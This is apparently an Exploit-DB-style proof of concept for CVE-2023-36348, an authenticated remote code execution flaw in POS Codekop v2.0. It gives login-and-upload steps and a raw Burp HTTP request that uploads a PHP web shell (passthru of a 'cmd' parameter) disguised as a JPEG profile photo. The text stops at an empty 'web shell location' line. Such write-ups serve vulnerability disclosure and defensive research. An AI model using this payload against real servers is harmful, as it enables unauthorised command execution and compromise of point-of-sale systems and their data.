# Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)  
# Date: 25-05-2023  
# Exploit Author: yuyudhn  
# Vendor Homepage:  
# Software Link:  
# Version: 2.0  
# Tested on: Linux  
# CVE: CVE-2023-36348  
# Vulnerability description: The application does not sanitize the filename  
parameter when sending data to /fungsi/edit/edit.php?gambar=user. An  
attacker can exploit this issue by uploading a PHP file and accessing it,  
leading to Remote Code Execution.  
# Reference:  
# Proof of Concept:  
1. Login to POS Codekop dashboard.  
2. Go to profile settings.  
3. Upload PHP script through Upload Profile Photo.  
Burp Log Example:  
POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1  
Host: localhost  
Content-Length: 8934  
Cache-Control: max-age=0  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: ""  
**Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data;  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36  
Sec-Fetch-User: ?1**  
Sec-Fetch-Dest: document  
Referer: http://localhost/research/pos-kasir-php/index.php?page=user  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhv  
Connection: close  
Content-Disposition: form-data; name="foto"; filename="asuka-rce.php"  
Content-Type: image/jpeg  
ÿØÿà JFIF HHÿþ6<?php passthru($_GET['cmd']); __halt_compiler(); ?>  
PHP Web Shell location: